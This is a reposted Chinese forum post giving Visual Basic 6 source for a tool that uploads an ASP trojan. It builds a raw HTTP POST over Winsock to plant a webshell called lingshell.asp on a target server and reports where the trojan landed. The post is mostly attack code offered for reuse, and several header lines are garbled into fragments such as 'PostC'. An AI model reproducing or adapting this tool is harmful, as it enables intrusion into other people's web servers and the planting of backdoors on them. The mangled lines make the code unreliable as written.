[转载] ASP木马后门提交工具全部核心VB代码

Private Sub Command1_Click()
Winsock1.RemotePort = Text3.Text
Winsock1.RemoteHost = Text2.Text
Winsock1.Connect
Command1.Enabled = False
Me.Timer2.Enabled = True
End Sub

Private Sub Timer2_Timer()
If InStr(Text6.Text, "lingshell.asp") Then
Me.Timer2.Enabled = False
MsgBox "上传成功!! 木马已经上传到 http://" & Text2.Text & "" & Text4.Text & " 这个位置的目录下.WebShell文件为 lingshell.asp", , "恭喜"
Else
Me.Timer2.Enabled = False
MsgBox "上传失败!", , "警告"
End If
End Sub

Private Sub winsock1_Connect()

’定义提交部分包头和数据 精华所在

Dim PostPOST
Dim PostAccept
Dim PostReferer
Dim PostAcceptLanguage
Dim PostContentType
Dim PostAcceptEncoding
Dim PostUserAgent
Dim PostHost
Dim PostContentLength
Dim PostConnection
Dim PostCacheControl
Dim PostCookie
Dim PostDATA
Dim TopPostDATA

PostPOST = "POST " & Text4.Text & " HTTP/1.1"
PostAccept = "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, application/x-shockwave-flash, */*"
PostReferer = "Referer: http://" & Text2.Text & "/"
PostAcceptLanguage = "Accept-Language: zh-cn"
PostC
PostAcceptEncoding = "Accept-Encoding: gzip, deflate"
PostUserAgent = "User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 9.1; linghao ; www.chinanethack.com)"
PostHost = "Host: " & Text2.Text & ""
PostC
PostC
PostCacheC
PostCookie = "Cookie: ASPSESSIONIDGGGGGSDQ=AMBLGJAACHFIJNEDMGGEHCHF"
PostDATA = Text1.Text

TopPostDATA = PostPOST _
& vbCrLf & PostAccept _
& vbCrLf & PostReferer _
& vbCrLf & PostAcceptLanguage _
& vbCrLf & PostContentType _
& vbCrLf & PostAcceptEncoding _
& vbCrLf & PostUserAgent _
& vbCrLf & PostHost _
& vbCrLf & PostContentLength _
& vbCrLf & PostConnection _
& vbCrLf & PostCacheControl _
& vbCrLf & PostCookie & vbCrLf _

Winsock1.SendData TopPostDATA

End Sub

Private Sub Command2_Click()
Winsock1.Close
Command1.Enabled = True
End Sub

Private Sub winsock1_DataArrival(ByVal bytesTotal As Long)

Dim HX As String
Winsock1.GetData HX
Text6.Text = HX
End Sub

Private Sub Form_Load()
MsgBox "版权www.chinanethack.com-零号所有 欢迎大家抄袭改进!"
End Sub

’这里要使用时间控件来判断是因为返回有个时间间隔问题.而且如果你提交的字节数不规范服务器有可能不响应你.所以用时间判断返回是比较合理的.代码写得不好`望见谅~ TopPostDATA = 你的木马 使用POST